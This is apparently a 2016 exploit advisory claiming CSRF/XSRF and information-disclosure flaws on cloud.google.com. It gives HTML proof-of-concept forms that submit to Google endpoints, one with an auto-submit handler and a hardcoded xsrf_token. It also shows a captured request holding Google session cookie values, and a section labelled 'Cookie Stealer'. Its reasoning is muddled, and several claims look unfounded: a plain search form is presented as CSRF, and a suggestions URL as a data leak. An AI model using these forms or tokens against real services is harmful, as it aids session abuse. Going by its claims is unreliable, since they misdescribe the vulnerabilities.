/************************************************************************************************ [+] Title : Google Cloud CSRF/XSRF [+] Exploit Author : Ashiyane Digital Security Team [+] Tested on : Windows - Firefox [+] Vendor Homepage : http://cloud.google.com [+] Date : 16 Feb. 2016 *************************************************************************************************/ ------------------------------------------------------ MeThod GET In CSRF Exploitation : ------------------------------------------------------ In a Cross Site Request Forgery (CSRF or XSRF) attack,a malicious site gets an unsuspecting user to make a secret HTTP request back to a legitimate site,forcing an unintentional action.To prevent such attacks,you need to verify that an incoming HTTP request came from an authenticated user under normal circumstances. In HTTP GET using methods described above, such as a simple hyperlink containing manipulated parameters and automatically loaded by a IMG tag. By the HTTP specification however, GET should be used as a safe method, that is, not significantly changing user's state in the application or Website . -------------------------------------------------------------- Snippet Index Page For Test TEXT Query : ------------------------------------------------------------- <form action="https://cloud.google.com/s/results" name="Ashexpl" enctype="multipart/form-data" method="get"> <div id="searchbox" class="devsite-searchbox"> <input type="text" placeholder="Put TEXT Here" class="devsite-search-query" name="q" autocomplete="off"></div> <button id="search-button" class="button button-blue big"> <img src="https://cloud.google.com/_static/8ceb0d7f64/images/v2/search.png" href="javascript:void(0)" alt="Search"></button> <input type="hidden" name="p" id="search_project" value="" data-project-name="Cloud Platform" data-project-path="" data-query-match=""/> <input type="hidden" id="suggest-category-label-2" value="Pages in Cloud Platform" /> <input type="hidden" id="suggest-category-label-3" value="Reference in Cloud Platform" /> <input type="hidden" id="suggest-category-label-1" value="Products" /> <input type="hidden" id="suggest-all-results-label" value="See all results for" /> </form> %%%---------------------------------------------------------------------------------------------------%%% # Snippet Code is no security token , not even a captcha security image,... %%%----------------------------------------------------------------------------------------------------%%% ----------------------------------------------------------------------------- Monitoring Request By Add-On Live HTTP Headers : ---------------------------------------------------------------------------- Host: cloud.google.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://cloud.google.com/s/results?q=Put TEXT Here Cookie: NID=76=rRbuP4kHDyns4naaQjW6wcyMB-Xw9n6N2xIlgHNWYfIaxs2K-dfsm- ow5-XYPtHxIx5VciM56o3yOfbyXEPIV1YMgC2SY; OGPC=5061821-25:4061130-15:5061869-4 :5061921-6:; OGP=-5061451:; SID=DQAAANcAAAC7oVKxr3- SwGXYeIdJt_3Gn2nIKr9WKH8cSft2ocgbQ7JNqjpnH9KS7eZ8spjf0GYFEWCQQpzwWp_ p_KoKHubovAbg; HSID=AA75jBY4zgwnmoJx-; SSID=AZhL_E8sQ9Pg5kV3Q; APISID=2EKrcpqeeR0u -St8/ApVPiHB2Cduyt__zU; SAPISID=uROLX92fAIFv2pX8/AkL_cuURan_o4uNMp; _ga=GA1.3.666289654.1455044406; __utmz=undefined=undefined|utm_term= undefined|utm_medium=undefined|utm_content__c=undefined|utm_campaign__c= undefined|utm_source__c=undefined| Connection: keep-alive ----------------------------------------------------------------------------------------- Warning GET Request (Information Disclosure Vulnerability) : ----------------------------------------------------------------------------------------- Description : The security vulnerability can be exploited by remote attackers without privilege Cloud system , GET Request View Detail Cloud . Vulnerability : https://cloud.google.com/_s/getsuggestions?hl=en&s=cloud&c=1 ///--------------------------------------------------------------------------------------------------------------------------------------/// ------------------------------- XSRF Exploitation : ------------------------------- This restriction means that the malicious domain will not be able to echo cookie values in any sort of programmatic way, such as injecting them as an HTTP header. When you make requests using the $http service (or anything built on top of $http, like $resource), AngularJS will look for the existence of the "XSRF-TOKEN" cookie. And, if it finds it, it will append the cookie value as the outgoing HTTP Header, "X-XSRF-TOKEN." This means that when you set the XSRF token cookie, AngularJS will send two tokens through which each HTTP AJAX request: [+] The cookie, XSRF-TOKEN. [+] The header, X-XSRF-TOKEN. -------------------------------------------- XSRF Token in GET request : -------------------------------------------- https://tools.digitalpoint.com/cookie-search?action=cloud.google.com In Subdomain Google Cookies Seen In Last 24h , The cookie, XSRF-TOKEN by view : Browser Firefox : view-source:https://cloud.google.com/ ------------------------------------------------------- XSRF Exploitation & Cookie Stealer : ------------------------------------------------------- Description : In this form we try to represent a value xsrf_token which amount is to see any visits Which can be used to steal it and set out with your data, Snippet Code : <form action="https://cloud.google.com/i18n/setlang/" method="post"> <input type="hidden" name="xsrf_token" value="kkLdJ1sQCXWmd7KAKiKNgAfVJhGqDVU-OXlcyiwb2wk6MTQ1NTIxNTEwMjkwOTI5MA" /> <select name="language" onchange="this.form.submit(); return false;"> <option value="en" selected>English</option> <option value="ja">日本語</option> </select> </form> ///-----------------------------------------------------------------------/// /-------------------------------------------------- Discovered By Und3rgr0und -------------------------------------------------/